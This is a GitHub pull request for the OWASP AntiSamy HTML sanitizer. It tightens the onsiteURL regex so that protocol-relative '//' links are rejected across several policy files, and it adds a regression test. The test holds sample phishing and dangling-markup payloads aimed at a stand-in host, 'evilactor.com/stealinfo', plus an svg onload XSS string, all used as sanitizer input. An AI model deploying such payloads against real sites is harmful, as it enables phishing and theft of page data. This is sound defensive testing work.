Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Improve onsiteURL regex to prevent jumping out the origin domain #57

Merged
merged 2 commits into from
Nov 13, 2020
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion src/main/resources/antisamy-anythinggoes.xml
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ http://www.w3.org/TR/html401/struct/global.html
<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>

<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>

<regexp name="boolean" value="(true|false)"/>
Expand Down
2 changes: 1 addition & 1 deletion src/main/resources/antisamy-ebay.xml
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ http://www.w3.org/TR/html401/struct/global.html
<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>

<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>

<regexp name="boolean" value="(true|false)"/>
Expand Down
2 changes: 1 addition & 1 deletion src/main/resources/antisamy-myspace.xml
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ http://www.w3.org/TR/html401/struct/global.html
<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>

<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>

<regexp name="boolean" value="(true|false)"/>
Expand Down
2 changes: 1 addition & 1 deletion src/main/resources/antisamy-slashdot.xml
Original file line number Diff line number Diff line change
Expand Up @@ -34,7 +34,7 @@ Slashdot allowed tags taken from "Reply" page:
-->

<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*"/>

</common-regexps>
Expand Down
2 changes: 1 addition & 1 deletion src/main/resources/antisamy-tinymce.xml
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@

<!-- force non-empty with a '+' at the end instead of '*'
-->
<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>

<!-- ([\w\\/\.\?=&amp;;\#-~]+|\#(\w)+)
-->
Expand Down
8 changes: 4 additions & 4 deletions src/main/resources/antisamy.xml
Original file line number Diff line number Diff line change
Expand Up @@ -54,19 +54,19 @@ http://www.w3.org/TR/html401/struct/global.html
<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>

<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
<regexp name="anchoredURL" value="#(\w)+"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>

<regexp name="boolean" value="(true|false)"/>
<regexp name="singlePrintable" value="[a-zA-Z0-9]{1}"/> <!-- \w allows the '_' character -->

<!-- This is for elements (ex: elemName { ... }) -->
<regexp name="cssElementSelector" value="[a-zA-Z0-9\-_]+|\*"/>

<!-- This is to list out any element names that are *not* valid -->
<regexp name="cssElementExclusion" value=""/>

<!-- This if for classes (ex: .className { ... }) -->
<regexp name="cssClassSelector" value="\.[a-zA-Z0-9\-_]+"/>

Expand Down
33 changes: 33 additions & 0 deletions src/test/java/org/owasp/validator/html/test/AntiSamyTest.java
Original file line number Diff line number Diff line change
Expand Up @@ -1425,4 +1425,37 @@ public void testGithubIssue40() throws ScanException, PolicyException {
assertThat(as.scan(test40, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("<svg onload=alert(1)//")));
//System.out.println("DOM parser: " + as.scan(test40, policy, AntiSamy.DOM).getCleanHTML());
}

@Test
public void testGithubIssue48() throws ScanException, PolicyException {

// Concern is that onsiteURL regex is not safe for URLs that start with //.
// For example: //evilactor.com?param=foo

final String phishingAttempt = "<a href=\"//evilactor.com/stealinfo?a=xxx&b=xxx\"><span style=\"color:red;font-size:100px\">"
+ "You must click me</span></a>";

// Output: <a rel="nofollow"><span style="color: red;font-size: 100.0px;">You must click me</span></a>

assertThat(as.scan(phishingAttempt, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
assertThat(as.scan(phishingAttempt, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));

// This ones never failed, they're just to prove a dangling markup attack on the following resulting HTML won't work.
// Less probable case (steal more tags):
final String danglingMarkup = "<div>User input: " +
"<input type=\"text\" name=\"input\" value=\"\"><a href='//evilactor.com?"+
"\"> all this info wants to be stolen with <i>danlging markup attack</i>" +
" until a single quote to close is found'</div>";

assertThat(as.scan(danglingMarkup, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
assertThat(as.scan(danglingMarkup, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));

// More probable case (steal just an attribute):
// HTML before attack: <input type="text" name="input" value="" data-attribute-to-steal="some value">
final String danglingMarkup2 = "<div>User input: " +
"<input type=\"text\" name=\"input\" value=\"\" data-attribute-to-steal=\"some value\">";

assertThat(as.scan(danglingMarkup2, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
assertThat(as.scan(danglingMarkup2, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));
}
}